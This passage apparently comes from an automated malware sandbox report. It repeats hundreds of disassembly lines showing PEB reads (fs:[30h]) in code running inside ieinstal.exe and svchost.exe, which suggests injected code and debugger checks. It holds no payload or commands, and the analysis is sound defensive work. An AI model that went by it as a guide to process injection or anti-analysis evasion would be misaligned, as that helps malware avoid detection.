      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA24A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA24A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E5210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E5210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F8A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA03A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA9B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA9B260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA2927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA74257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAAEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA14BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA14BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA14BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9F1B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA9D380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA103E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA653CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA653CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EF358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA13B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA13B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EDB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EDB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA120A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA290AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9080 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA63884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA63884 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E58EC mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7B8D0 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA7B8D0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E40E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA67016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA67016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA67016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9FB02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAB1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA00050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA00050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA669A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA161A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA161A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EAA49A4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA651BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA12990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA741E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EB1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA04120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA04120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA04120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA04120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA04120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA1513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9E9100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1EA0B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EB171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 19_2_1E9EC962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032E131B mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322DB60 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03253B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03253B7A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322DB40 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F8B58 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322F358 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03254BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03254BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03254BAD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F5BA5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032E138A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03231B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03231B8F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032DD380 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252397 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325B390 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032503E2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324DBE9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A53CA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03264A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03264A2C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03238A0A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03225210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03225210 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03225210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03225210 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322AA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03243A1C mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EAA16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032DB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032DB260 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F8A62 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0326927A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229240 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032EEA55 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032B4257 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032252A5 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323AAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325FAB0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325D294 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252AE4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252ACB mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03244120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03244120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03244120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03244120 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03244120 mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325513A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03229100 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322C962 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322B171 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324B944 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032561A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032561A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A69A6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A51BE mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325A185 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0324C182 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03252990 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032B41E8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0322B1E1 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325002D mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0323B02A mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F4015 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032A7016 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032F1074 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032E2073 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03240050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_03240050 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032520A0 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_032690AF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325F0BF mov ecx, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325F0BF mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\svchost.exeCode function: 22_2_0325F0BF mov eax, dword ptr fs:[00000030h]
